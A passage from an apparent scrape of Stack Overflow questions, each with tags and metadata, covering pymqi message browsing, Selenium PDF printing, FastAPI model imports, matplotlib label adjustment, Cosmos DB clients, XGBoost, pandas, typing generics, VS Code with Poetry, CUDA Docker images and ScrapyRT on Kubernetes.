matches.</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 user_MsgId = '414d51204e41544d333030202020202817d9ff650a742f22' overall_message = [] keep_running = True while keep_running: md = pymqi.MD() md.Format = pymqi.CMQC.MQFMT_STRING message = queue.get(None, md, gmo) print(md.MsgId.hex()) if md.MsgId.hex() != user_MsgId: continue else: overall_message.append(message) break queue.close() qmgr.disconnect() </code></pre> <p>The above solution gives me the correct message, but performance goes down as the number of messages grows. 
Can anyone please suggest a better approach to browse a message by MsgId or CorrelId?</p> <p>I tried the below code as per a suggestion (edited here), but it is not working:</p> <pre><code>queue = pymqi.Queue(qmgr, queue_name, pymqi.CMQC.MQOO_BROWSE) gmo = pymqi.GMO() gmo.MatchOptions = pymqi.CMQC.MQMO_MATCH_MSG_ID gmo.Version = pymqi.CMQC.MQMO_VERSION_2 gmo.Options = pymqi.CMQC.MQGMO_WAIT | pymqi.CMQC.MQGMO_BROWSE_NEXT | pymqi.CMQC.MQGMO_NO_PROPERTIES gmo.WaitInterval = 5000 md = pymqi.MD() md.Version = pymqi.CMQC.MQMO_VERSION_2 md.Format = pymqi.CMQC.MQFMT_STRING md.MsgId = b'414d51204e41544d333030202020202817d9ff650a742f22' # this is the same output which I get from above message = queue.get(None, md, gmo) print(message) print(md.MsgId.hex()) queue.close() qmgr.disconnect() </code></pre>
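One detail worth double-checking in that last snippet (an observation, not a tested fix): `md.MsgId` holds the raw 24-byte identifier, while `md.MsgId.hex()` prints a 48-character hex string. Assigning the hex string's ASCII bytes back (`b'414d51...'`) can never match; it needs `bytes.fromhex`:

```python
def msgid_from_hex(hex_string):
    """Convert the hex form printed by md.MsgId.hex() back to the raw bytes
    that MQMD.MsgId actually stores (MQ message ids are 24 bytes)."""
    raw = bytes.fromhex(hex_string)
    assert len(raw) == 24, f"unexpected MsgId length: {len(raw)}"
    return raw
```

With this, the match attempt becomes `md.MsgId = msgid_from_hex('414d51204e41544d333030202020202817d9ff650a742f22')` before the `queue.get` call. (Note the `AMQ ` prefix in the decoded bytes, which is what queue-manager-generated message ids start with.)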
<python><ibm-mq><pymqi>
2024-01-13 06:25:05
2
450
user_123
77,810,374
5,795,116
Empty pdf while scraping using Python and Selenium
<p>I'm facing an issue while attempting to print a PDF from a webpage using Selenium in Python. The webpage in question is <a href="https://jamabandi.nic.in/land%20records/NakalRecord" rel="nofollow noreferrer">https://jamabandi.nic.in/land%20records/NakalRecord</a>. I'm trying to select the first record from each drop-down and then click on the &quot;Nakal&quot; button to generate a PDF.</p> <p>However, the resulting PDF is always empty, even though there is a table present on the webpage. I've tried both the manual print-to-PDF operation and automated printing using Selenium, but in both cases, the generated PDF is empty.</p> <pre><code>from selenium import webdriver from selenium.webdriver.chrome.service import Service service = Service() options = webdriver.ChromeOptions() # Set up preferences for printing to PDF settings = { &quot;recentDestinations&quot;: [{&quot;id&quot;: &quot;Save as PDF&quot;, &quot;origin&quot;: &quot;local&quot;, &quot;account&quot;: &quot;&quot;}], &quot;selectedDestinationId&quot;: &quot;Save as PDF&quot;, &quot;version&quot;: 2 } prefs = { 'printing.print_preview_sticky_settings.appState': json.dumps(settings), 'printing.print_to_file': True, 'printing.print_to_file.path': '/Users/jatin/Downloads/output.pdf' # Specify the desired output path } chrome_options.add_experimental_option('prefs', prefs) import urllib.request from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.chrome.options import Options from webdriver_manager.chrome import ChromeDriverManager # Set up Chrome options chrome_options = Options() # chrome_options.add_argument('--headless') # Optional: Run Chrome in headless mode chrome_options.add_argument('--kiosk-printing') try: service = Service(ChromeDriverManager().install()) except ValueError: latest_chromedriver_version_url = &quot;https://chromedriver.storage.googleapis.com/LATEST_RELEASE&quot; latest_chromedriver_version = 
urllib.request.urlopen(latest_chromedriver_version_url).read().decode('utf-8') service = Service(ChromeDriverManager(version=latest_chromedriver_version).install()) options = Options() url='https://jamabandi.nic.in/land%20records/NakalRecord' # options.add_argument('--headless') #optional. driver = webdriver.Chrome(service=service, options=options) driver.get(url) dropdown_district = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddldname&quot;]')) dropdown_district.select_by_index(1) # Select the tehsil dropdown element and choose the first option,we will loop here for multiple anchals drop_down_tehsil = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddltname&quot;]')) drop_down_tehsil.select_by_index(1) drop_down_vill = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlvname&quot;]')) drop_down_vill.select_by_index(1) drop_down_year = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlPeriod&quot;]')) drop_down_year.select_by_index(1) owner_names=Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]')) dropdown_locator = (By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]') drop_down_owner = Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ddlOwner&quot;]')) drop_down_owner.select_by_index(1) owner_names =Select(driver.find_element(By.XPATH, '//*[@id=&quot;ctl00_ContentPlaceHolder1_ListBox1&quot;]')) owner_names.select_by_index(2) page_source = BeautifulSoup(driver.page_source, 'html.parser') table = page_source.find_all('table') div_col_lg_12 = page_source.find('div', class_='col-lg-12') # Find links within the selected div links_within_div = div_col_lg_12.find_all('td') links_within_div # Perform actions on the links or retrieve their attributes for link in links_within_div: k=link.find_all('a') if len(k)&gt;0: new_link=(k[0]['href']) javascript_code = 
str(new_link) # Execute the JavaScript code driver.execute_script(javascript_code) window_handles=driver.window_handles driver.switch_to.window(window_handles[-1]) # Open the print dialog using JavaScript driver.execute_script('window.print();') </code></pre> <p><a href="https://i.sstatic.net/rQzha.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/rQzha.png" alt="enter image description here" /></a></p> <p><a href="https://i.sstatic.net/0liEg.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/0liEg.png" alt="enter image description here" /></a></p>
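As an alternative to `window.print()` with kiosk printing, Chromium's DevTools protocol can render the current page to PDF directly, which bypasses the print-preview settings entirely. The CDP call returns base64-encoded data; the decoding helper below is testable on its own, and the `execute_cdp_cmd` line is shown as a comment because it needs a live driver:

```python
import base64

def save_cdp_pdf(result, path):
    """Write the base64 'data' field returned by Page.printToPDF to a file."""
    # With a live Selenium Chrome driver you would obtain `result` via:
    #   result = driver.execute_cdp_cmd("Page.printToPDF", {"printBackground": True})
    pdf_bytes = base64.b64decode(result["data"])
    with open(path, "wb") as f:
        f.write(pdf_bytes)
    return len(pdf_bytes)
```

If the PDF produced this way is also empty, that would suggest the report content lives in a child window or frame that the driver has not switched to, rather than a printing problem.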
<python><pandas><web-scraping><selenium-chromedriver><webdriver>
2024-01-13 05:15:30
1
327
jatin rajani
77,810,274
11,748,924
`%%capture` jupyter notebook or colab doesn't work for storing cell output that display image or table pandas
<p>I have read the docs about <code>%%capture cap</code>. It only works for the text representation. I expected it to store everything that has been displayed in the cell output: images, tables, even HTML elements.</p> <p>Then I could load it into another cell with identical output:</p> <h1>CELL_A</h1> <pre><code>%%capture cap import matplotlib.pyplot as plt # Data x = [1, 2] y = [3, 4] # Create a simple plot plt.plot(x, y) # Add labels to the axes plt.xlabel('X-axis') plt.ylabel('Y-axis') # Add a title to the plot plt.title('Simple Plot Example') # Show the plot plt.show() # Save the captured output to a text file with open('stdout.txt', 'w') as file: file.write(cap.stdout) </code></pre> <h1>CELL_B</h1> <pre><code>#@title Reloading CELL_A output with open('stdout.txt', 'r') as file: cell_a_out = file.read() display(cell_a_out) </code></pre> <p>It should display the matplotlib image. I know matplotlib provides a save-figure method to save the image, but I expect to save everything that has been displayed in the cell output, not only the image. That way, if the cell output contains both a pandas table and a matplotlib image, everything can be stored in a single file.</p>
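For what it's worth, `cap.stdout` only ever holds the text stream; rich outputs (figures, HTML tables) land in `cap.outputs` as objects carrying MIME bundles. A hedged sketch of persisting such bundles with the stdlib, assuming each output exposes a `data` dict the way IPython's rich-output objects do:

```python
import json

def save_outputs(bundles, path):
    """Persist a list of MIME-bundle dicts,
    e.g. {'image/png': '<base64>', 'text/plain': '...'}."""
    with open(path, "w") as f:
        json.dump(bundles, f)

def load_outputs(path):
    with open(path) as f:
        return json.load(f)
```

In the notebook you could build `bundles = [out.data for out in cap.outputs]` and later redisplay each bundle with `IPython.display.publish_display_data(bundle)`; both names are from IPython's API, but I have only sketched that part, not run it in your environment.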
<python><matplotlib><jupyter-notebook><google-colaboratory><stdout>
2024-01-13 04:10:55
2
1,252
Muhammad Ikhwan Perwira
77,810,225
12,461,032
fastAPI multiple model file relationship causes circular dependency issue
<p>I am relatively new to FastAPI.</p> <p>I am developing a set of APIs. To make my project better structured, I separated my models into multiple files. For now, I have an Employee and a Skills table. There is a one-to-many relationship from employee to skills, where each employee can have multiple skills, tied together with <code>employee_id</code>.</p> <p>This is my main module, where I include the routers:</p> <pre><code> #main.py app.include_router(skill.router, prefix=&quot;/skill&quot;, tags=[&quot;skill&quot;]) app.include_router(employee.router, prefix=&quot;/employee&quot;, tags=[&quot;employee&quot;]) #employee.py Base = declarative_base() class Employee(Base): __tablename__ = &quot;core_employees&quot; employee_id = mapped_column(Integer, primary_key=True, index=True) first_name = mapped_column(String) last_name = mapped_column(String) skills = relationship(Skill) #skill.py Base = declarative_base() class Skill(Base): __tablename__ = &quot;skills&quot; skill_id = mapped_column(Integer, primary_key=True, index=True) employee_id = mapped_column(Integer, ForeignKey(Employee.employee_id)) skill_name = mapped_column(String) skill_level = mapped_column(Integer) employee = relationship(Employee) </code></pre> <p>The file structure is like this:</p> <pre><code> main.py model/ │ ├── employee.py ├── skill.py </code></pre> <p>I initially had difficulty with separating models into different files; for instance, <code>employee = relationship('Employee')</code> was not working, and I had to pass the actual class.</p> <p>Now there is a problem. <code>skill.py</code> has to import <code>employee.py</code> and vice versa, which is a circular dependency problem.</p> <p>I tried to add both imports to a <a href="https://github.com/pydantic/pydantic/issues/1873" rel="nofollow noreferrer">package</a> (making models a package), but it did not work for me. 
I also tried <a href="https://stackoverflow.com/questions/63420889/fastapi-pydantic-circular-references-in-separate-files">forward refs</a> which also did not work. Please help me.</p> <p>Thanks.</p>
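A likely reason the string form `relationship('Employee')` failed (this is an inference from the code shown, not verified): each file calls `declarative_base()` separately, so the two models live in different registries and the string name cannot be resolved. With a single shared `Base` (say, in `model/base.py`, a file name of my invention) imported by both files, string names resolve lazily and neither module needs to import the other. The toy below illustrates that lazy-resolution mechanism with plain Python, no SQLAlchemy required:

```python
class Registry:
    """Toy version of what one shared declarative Base provides:
    a single namespace where string class names resolve lazily."""
    def __init__(self):
        self._classes = {}

    def register(self, cls):
        self._classes[cls.__name__] = cls
        return cls

    def resolve(self, name):
        # Lookup happens at use time, after all modules are imported,
        # so no model module ever needs to import another one.
        return self._classes[name]

registry = Registry()

@registry.register
class Employee:
    skills_target = "Skill"      # string reference, like relationship("Skill")

@registry.register
class Skill:
    employee_target = "Employee" # string reference back the other way
```

The analogous SQLAlchemy change would be: both model files import the same `Base`, and both relationships use string targets, e.g. `relationship("Skill", back_populates="employee")`.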
<python><fastapi><circular-dependency>
2024-01-13 03:31:26
1
472
m0ss
77,810,105
3,973,175
python3's adjust_text is moving text badly
<p>I have overlapping text from my script:</p> <pre><code>import matplotlib.pyplot as plt from adjustText import adjust_text x = [12,471,336,1300] y = [2,5,4,11] z = [0.1,0.2,0.3,0.4] im = plt.scatter(x, y, c = z, cmap = &quot;gist_rainbow&quot;, alpha = 0.5) plt.colorbar(im) texts = [] texts.append(plt.text(783, 7.62372448979592, 'TRL1')) texts.append(plt.text(601, 6.05813953488372, 'CFT1')) texts.append(plt.text(631, 4.28164556962025, 'PTR3')) texts.append(plt.text(665, 7.68018018018018, 'STT4')) texts.append(plt.text(607, 5.45888157894737, 'RSC9')) texts.append(plt.text(914, 4.23497267759563, 'DOP1')) texts.append(plt.text(612, 7.55138662316476, 'SEC8')) texts.append(plt.text(766, 4.1264667535854, 'ATG1')) texts.append(plt.text(681, 3.80205278592375, 'TFC3')) plt.show() </code></pre> <p>which shows overlapping text: <a href="https://i.sstatic.net/Glh77.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Glh77.png" alt="enter image description here" /></a></p> <p>however, when I add <code>adjust_text</code>:</p> <pre><code>import matplotlib.pyplot as plt from adjustText import adjust_text x = [12,471,336,1300] y = [2,5,4,11] z = [0.1,0.2,0.3,0.4] im = plt.scatter(x, y, c = z, cmap = &quot;gist_rainbow&quot;, alpha = 0.5) plt.colorbar(im) data = [ (783, 7.62372448979592, 'TRL1'), (601, 6.05813953488372, 'CFT1'), (631, 4.28164556962025, 'PTR3'), (665, 7.68018018018018, 'STT4'), (607, 5.45888157894737, 'RSC9'), (914, 4.23497267759563, 'DOP1'), (612, 7.55138662316476, 'SEC8'), (766, 4.1264667535854, 'ATG1'), (681, 3.80205278592375, 'TFC3') ] texts = [plt.text(x, y, l) for x, y, l in data] adjust_text(texts) plt.savefig('adjust.text.png', bbox_inches='tight', pad_inches = 0.1) </code></pre> <p>the labels are shifted to the lower left corner, making them useless, instead of just a little overlapped.</p> <p>I am following clues from <code>adjust_text(texts)</code> as suggested by the below two links,</p> <p><a 
href="https://stackoverflow.com/questions/63583615/how-to-adjust-text-in-matplotlib-scatter-plot-so-scatter-points-dont-overlap">How to adjust text in Matplotlib scatter plot so scatter points don&#39;t overlap?</a></p> <p>and <a href="https://adjusttext.readthedocs.io/en/latest/Examples.html" rel="nofollow noreferrer">https://adjusttext.readthedocs.io/en/latest/Examples.html</a></p> <p>I get this:<a href="https://i.sstatic.net/jF5UG.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/jF5UG.png" alt="enter image description here" /></a></p> <p>How can I get <code>adjust_text</code> to fix the overlapping labels?</p>
<python><python-3.x><matplotlib>
2024-01-13 02:23:50
1
6,227
con
77,810,074
6,423,456
How can I maintain an async CosmosDB connection pool in a FastAPI app?
<p>I have a FastAPI app that uses the <code>azure-cosmos</code> library to store data in a CosmosDB. I'm expecting to have a ton of traffic, so I want to create a pool of async CosmosDB clients.</p> <p>Is that something the azure-cosmos library supports? I can't seem to find any examples of using a connection pool for Cosmos DB. Does it even make sense to have a pool of async CosmosDB clients? Or can one connection handle massive amounts of traffic?</p> <p>If azure-cosmos has no direct support for connection pools, but it makes sense to have a pool, is there a generic library that can assist with maintaining a pool of connections?</p>
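For context on whether a pool is even needed: the async `CosmosClient` in azure-cosmos sits on an aiohttp-based transport that maintains its own connection pool, and the usual guidance is one client instance per process rather than a hand-rolled pool of clients. A sketch of that shape, with a stand-in client class so the example is self-contained (swap in `azure.cosmos.aio.CosmosClient` plus your real endpoint and key, and call `get_client()` from request handlers and `shutdown()` from FastAPI's shutdown/lifespan hook):

```python
import asyncio

class FakeCosmosClient:
    """Stand-in for azure.cosmos.aio.CosmosClient with the same open/close shape."""
    def __init__(self, endpoint, key):
        self.endpoint, self.key = endpoint, key
        self.closed = False

    async def close(self):
        self.closed = True

_client = None

def get_client():
    """Lazily create one shared client per process."""
    global _client
    if _client is None:
        _client = FakeCosmosClient(
            "https://example-account.documents.azure.com",  # placeholder endpoint
            "example-key",                                  # placeholder key
        )
    return _client

async def shutdown():
    # Close the shared client once, at application shutdown.
    if _client is not None:
        await _client.close()
```

The singleton amortizes connection setup across all requests; whether one client suffices for your traffic is something only load testing can confirm.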
<python><azure-cosmosdb><fastapi>
2024-01-13 02:06:58
2
2,774
John
77,810,045
214,526
How to set important features as attribute on XGBRegressor and save as part of json while saving the model
<p>I have trained an <code>XGBRegressor</code> model. Now, I am trying to save the important features as an attribute on the model, and I want the attribute to get saved/restored along with the model.</p> <p>I have 2 issues here -</p> <p>1.</p> <pre><code>regressor.fit(X=X_train, y=y_train, eval_set=[(X_train, y_train), (X_validation, y_validation)], verbose=False) feature_importance: List[Tuple[str, float]] = sorted( regressor.get_booster().get_score(importance_type=&quot;gain&quot;).items(), key=lambda x: x[1] ) selected_features: List[str] = [x[0] for x in feature_importance if x[1] &gt; 0] setattr(regressor, &quot;selected_features&quot;, selected_features) </code></pre> <p>The <code>setattr</code> and corresponding <code>getattr</code> are giving me lint warnings (B010 and B009) - is there a better way to do this and avoid those warnings?</p> <p>The getattr usage is something like this -</p> <pre><code>def get_model_features(model: XGBRegressor) -&gt; List[str] | None: return getattr(model, &quot;selected_features&quot;) if (model is not None and isinstance(model, XGBRegressor)) else None </code></pre> <ol start="2"> <li>The attribute does not get saved in the json file. I am using the following call to save -</li> </ol> <p><code>regressor.save_model(fname=&quot;model.json&quot;)</code></p> <p>How can I accomplish this? I want to avoid pickle save/restore.</p>
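Two directions worth considering (both suggestions, not verified against any particular xgboost version): the booster itself supports string attributes via `regressor.get_booster().set_attr(selected_features=json.dumps(...))`, and booster attributes do travel inside the saved model; or, staying entirely in the stdlib, write a sidecar JSON next to `model.json`. The sidecar variant is sketched below:

```python
import json
from pathlib import Path
from typing import List, Optional

def save_features(model_path: str, selected_features: List[str]) -> None:
    """Write the feature list next to the model file, e.g. model.features.json."""
    sidecar = Path(model_path).with_suffix(".features.json")
    sidecar.write_text(json.dumps(selected_features))

def load_features(model_path: str) -> Optional[List[str]]:
    """Read the feature list back, or return None when no sidecar exists."""
    sidecar = Path(model_path).with_suffix(".features.json")
    return json.loads(sidecar.read_text()) if sidecar.exists() else None
```

This also sidesteps the B009/B010 warnings entirely, since no dynamic attribute is attached to the model object at all.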
<python><python-3.x><xgboost><xgbregressor>
2024-01-13 01:47:43
2
911
soumeng78
77,809,859
2,537,486
Change the type of a column multi-index level?
<p>I am reading a <code>.csv</code> file that looks like this:</p> <pre><code>,1,1,2,2,3,3... ,'A','B','A','B',... 0,1,2,3,4,... 1,2,3,4,5,... </code></pre> <p>I read this with <code>df = pd.read_csv(fname,header=[0,1],index_col=0)</code></p> <p>Now, deplorably, pandas sets the dtype of the first level of the column multiindex to string, even though there are only integers in the first row of the file. Unfortunately, there is no way to tell pandas what dtype to use for each row (level) of the column index. (Something like <code>header={0:'int64',1:'string'}</code>).</p> <p>Now, it seems that there should be a simple and easy way to convert one level of the multiindex columns to <code>int</code>, but I searched for a long time and could not come up with anything. Right now, I am re-generating the index from scratch, but that seems overkill.</p> <p>Another solution that could possibly work would be to convert the multiindex to a DataFrame, change the dtypes, then set the index from the DataFrame. That also seems like an overcomplicated process.</p> <p>Suggestions?</p>
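For the record, the conversion can be done on the existing index without regenerating it: `MultiIndex.set_levels` accepts a re-typed level. A sketch, assuming level 0 holds the integer-like strings:

```python
import pandas as pd

def int_level0(df: pd.DataFrame) -> pd.DataFrame:
    """Convert the first level of the column MultiIndex from str to int."""
    df = df.copy()
    df.columns = df.columns.set_levels(df.columns.levels[0].astype(int), level=0)
    return df
```

After this, `df[1]` selects by the integer key rather than the string `'1'`.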
<python><pandas><csv><multi-index>
2024-01-13 00:04:42
2
1,749
germ
77,809,714
7,809,915
Get page with requests without response or status code
<p>I use the following source code:</p> <pre><code>import requests url = &quot;https://www.baha.com/nasdaq-100-index/index/tts-751307/name/asc/1/index/performance/471&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/adobe/stocks/details/tts-117450574&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/advanced-micro-devices/stocks/details/tts-117449963&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/airbnb-inc/stocks/details/tts-208432020&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/alphabet-a/stocks/details/tts-117453820&quot; web = requests.get(url) print(web.status_code) url = &quot;https://www.baha.com/alphabet-c/stocks/details/tts-117453810&quot; web = requests.get(url) print(web.status_code) </code></pre> <p>Most of the time, only the first three pages can be fetched; after that there is no status code and the program seems to stop responding, or I sometimes get a 503 response even though I can open the page in the browser.</p> <p>Why does this problem arise, and how can I solve it?</p>
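The 503s plus the hangs usually point to the site throttling or blocking non-browser clients rather than a bug in the code (an inference; I cannot verify baha.com's behavior). Two things that typically help: always pass a `timeout` and a browser-like `User-Agent` header, e.g. `requests.get(url, headers={"User-Agent": "Mozilla/5.0"}, timeout=10)`, and retry with a growing delay. The retry part, with the stdlib only:

```python
import time

def get_with_retry(fetch, retries=3, base_delay=1.0):
    """Call fetch() until it succeeds, sleeping base_delay * 2**attempt between tries."""
    last_error = None
    for attempt in range(retries):
        try:
            return fetch()
        except Exception as error:  # narrow to requests.RequestException in real code
            last_error = error
            time.sleep(base_delay * 2 ** attempt)
    raise last_error
```

Usage would be `web = get_with_retry(lambda: requests.get(url, headers=headers, timeout=10))`; heavier blocking (e.g. JavaScript challenges) would need a real browser instead.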
<python><python-3.x><python-requests><python-requests-html>
2024-01-12 23:11:43
1
490
M14
77,809,695
2,474,876
partial() on python types?
<p>I often use type hints to help document code &amp; occasionally when the type signatures are too complex &amp; repeatedly used I alias them like this:</p> <pre class="lang-py prettyprint-override"><code>MyType = Dict[Tuple[int,...], float] # ex: cluster &amp; score. </code></pre> <p>Is there a way in Python to parametrize parts of a type? A common use case is when I want to describe functions returning generators. For instance the <code>Generator[int, None, None]</code> notation works but the unused <code>None</code> details could be hidden in a new type.</p> <p>Does there exist something like <code>partial</code> functions on types, where we can &quot;lock in&quot; some of the sub type parameters? Or perhaps this is doable via <code>Generics</code>? Conceptually I'm thinking of something like this:</p> <pre class="lang-py prettyprint-override"><code>MyGenType[int] = functools.partial(Generator, None, None) # pseudo code! </code></pre>
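There is: a generic type alias does exactly this "lock in some parameters" job. Subscripting with a `TypeVar` leaves one slot open, and the alias can be parametrized later:

```python
from typing import Generator, TypeVar

T = TypeVar("T")

# Lock in the send/return parameters; leave the yield type open.
SimpleGen = Generator[T, None, None]

def count_up(n: int) -> SimpleGen[int]:
    yield from range(n)
```

Two side notes: `Iterator[int]` is the conventional shorthand when the send/return types are `None` anyway, and newer Python versions offer nicer spellings for the alias itself (`TypeAlias` on 3.10+, the `type` statement on 3.12+).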
<python><generics><python-typing><type-alias>
2024-01-12 23:04:49
1
417
eliangius
77,809,648
5,960,363
VS Code uses wrong interpreter with Poetry and Docker
<h2>Question</h2> <p>How can I get VS Code to default to my poetry interpreter?</p> <h2>Background</h2> <p>I'm working on a Python project in a dev container based on a Debian image, with the Python extension installed in the container. I use Poetry for dependency management. For debug simplicity I'm running as root.</p> <p>Poetry is successfully installed to <code>/opt/poetry</code> using a <a href="https://python-poetry.org/docs/#installing-manually" rel="nofollow noreferrer">manual install</a>. I run <code>poetry install</code> from my mounted code at <code>/myproject</code>, and Poetry correctly creates a venv outside my mounted volume at <code>/root/.cache/pypoetry/virtualenvs/myproject-somehash-py3.11</code>.</p> <h2>Expected behavior</h2> <p>When I open a .py file for editing, I expect VS Code to select the Python interpreter, based on the <a href="https://code.visualstudio.com/docs/python/environments#_manually-specify-an-interpreter" rel="nofollow noreferrer">VS Code docs</a>:</p> <blockquote> <p>If an interpreter hasn't been specified, then the Python extension automatically selects the interpreter with the highest version in the following priority order:</p> <ol> <li>Virtual environments located directly under the workspace folder.</li> <li>Virtual environments related to the workspace but stored globally. For example, Pipenv or Poetry environments that are located outside of the workspace folder.</li> <li>Globally installed interpreters. 
For example, the ones found in /usr/local/bin, C:\python38, etc.</li> </ol> </blockquote> <h2>Actual (surprising) behavior</h2> <ul> <li>VS Code (technically its Python extension, I believe) defaults to the global interpreter at <code>/usr/local/bin/python</code>.</li> <li>It <strong>does</strong> find and display the correct Poetry interpreter in the &quot;Select Interpreter&quot; dialog, but it does not default to that interpreter, which is the behavior I want:</li> </ul> <p><a href="https://i.sstatic.net/96e3w.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/96e3w.png" alt="screencap of interpreter selection window" /></a></p> <ul> <li>If I select the Poetry interpreter manually, this resolves the problem. This isn't a scalable solution (I want team members to be able to &quot;grab and go&quot; with the dev container).</li> <li>I cannot just add the path to the interpreter directly, because Poetry adds a hash to the virtual environment folder name (e.g. <code>/virtualenvs/myproject-45HY9SC-py3.11/path to python</code>)</li> <li>I cannot use a .venv in the project root - this is a solution used by some but will not work for my team.</li> </ul> <h2>Potential root cause</h2> <p>I've noticed that inside the venv, <code>bin/python</code> symlinks to <code>/usr/local/bin/python</code>. Could the Python extension be following this to the global python and thus &quot;skipping&quot; the poetry Python? Surely that can't be the desired behavior, given the documentation, so I'm skeptical.</p> <p>Note: Poetry offers a setting to <a href="https://python-poetry.org/docs/configuration/#virtualenvsoptionsalways-copy" rel="nofollow noreferrer">always copy</a> rather than symlink, but apparently Python is excepted from this setting (it still symlinks).</p>
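One workaround pattern for the hashed venv name (a sketch, not an official mechanism) is to have the dev container's `postCreateCommand` ask Poetry where the venv is and write that path into workspace settings, so every team member's container self-configures. `poetry env info -p` prints the venv directory; the helper takes the path as an argument too, so it can run without Poetry installed:

```python
import json
import subprocess
from pathlib import Path

def write_interpreter_settings(venv_path=None):
    """Point VS Code at the Poetry venv interpreter by writing .vscode/settings.json.
    Intended to run from a devcontainer postCreateCommand; the script file name
    and invocation are up to you."""
    if venv_path is None:
        # `poetry env info -p` prints the venv directory for the current project
        venv_path = subprocess.check_output(
            ["poetry", "env", "info", "-p"], text=True
        ).strip()
    settings_dir = Path(".vscode")
    settings_dir.mkdir(exist_ok=True)
    settings = {"python.defaultInterpreterPath": f"{venv_path}/bin/python"}
    (settings_dir / "settings.json").write_text(json.dumps(settings, indent=2))
    return settings
```

`python.defaultInterpreterPath` is only a default, so it will not override an interpreter someone has already selected manually, which is usually the desired behavior here.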
<python><docker><visual-studio-code><python-poetry><vscode-remote>
2024-01-12 22:48:08
1
852
FlightPlan
77,809,634
573,082
How to create windows-based CUDA-enabled docker image?
<p>I'm new to docker. I created an executable from a python script (with <code>pyinstaller</code>) that I want to run in a docker container. That executable needs CUDA. I found CUDA-enabled images <a href="https://hub.docker.com/r/nvidia/cuda" rel="nofollow noreferrer">here</a>. But these images are for Linux. I cannot find a CUDA-enabled image for Windows. I'm not clear on what I should do or how to proceed. How can I create a CUDA-enabled image where I can run my executable inside the docker container?</p> <p><strong>Dockerfile</strong></p> <pre><code>FROM nvidia/cuda:12.3.1-base-ubuntu20.04 COPY myapp.exe /app WORKDIR /app CMD [&quot;myapp.exe&quot;] </code></pre>
<python><windows><docker><dockerfile><cuda>
2024-01-12 22:44:15
1
14,501
theateist
77,809,536
709,439
How to store tabular data in Python, to be able to search using different indexes?
<p>I have a table of data, which I read from a database; something like:</p> <div class="s-table-container"> <table class="s-table"> <thead> <tr> <th>id</th> <th>name</th> <th>timestamp</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Alice</td> <td>324234234</td> </tr> <tr> <td>2</td> <td>Bob</td> <td>756756746</td> </tr> <tr> <td>...</td> <td></td> <td></td> </tr> <tr> <td>999</td> <td>Zoe</td> <td>125785753</td> </tr> </tbody> </table> </div> <p>I know I can use a <code>dictionary</code>:</p> <pre><code>people = {} cursor = self.db.query(&quot;SELECT * FROM people&quot;) rows = cursor.fetchall() for row in rows: people[row.id] = row </code></pre> <p>Then, to search the <code>people</code> dictionary by <code>id</code>, I do:</p> <pre><code>id = 123 if (id in people): print(f&quot;name of person with id {id} is {people[id].name}&quot;) else: print(f&quot;person with id {id} not found in people&quot;) </code></pre> <p>But I would like to be able to search (efficiently, in O(1) time) by <code>timestamp</code>, too.</p> <p>So I ask: can I use a dictionary (and if so, how do I add secondary indexes?), or should I use some other data type?<br /> I'd prefer using Python built-in data types, avoiding external libraries if possible.</p>
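One way to picture the secondary-index idea with built-in types only (my own sketch, not code from the question, and I assume each row is an `(id, name, timestamp)` tuple) is to build one dict per lookup key over the same row objects:

```python
rows = [
    (1, "Alice", 324234234),
    (2, "Bob", 756756746),
    (999, "Zoe", 125785753),
]

# One dict per lookup key; both point at the same row tuples, so the
# extra cost is a dict of references, and each lookup stays O(1).
by_id = {row[0]: row for row in rows}
by_timestamp = {row[2]: row for row in rows}

def find_by_id(id_):
    return by_id.get(id_)        # None if absent

def find_by_timestamp(ts):
    return by_timestamp.get(ts)  # None if absent
```

Any number of further indexes follow the same pattern, at the price of keeping every dict in sync when rows change.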
<python><python-3.x>
2024-01-12 22:17:03
1
17,761
MarcoS
77,809,501
9,092,563
ScrapyRT Port Unreachable in Kubernetes Docker Container Pod
<p>I'm experiencing difficulties in accessing a ScrapyRT service running on specific ports within a Kubernetes pod. My setup includes a Kubernetes cluster with a pod running a Scrapy application, which uses ScrapyRT to listen for incoming requests on designated ports. These requests are intended to trigger spiders on the corresponding ports.</p> <p>Despite correctly setting up a Kubernetes service and referencing the Scrapy pod in it, I'm unable to receive any incoming requests to the pod. My understanding is that in Kubernetes networking, a service should be created first, followed by the pod, allowing inter-pod communication and external access through the service. Is this correct?</p> <p>Below are the relevant configurations:<br><br> 
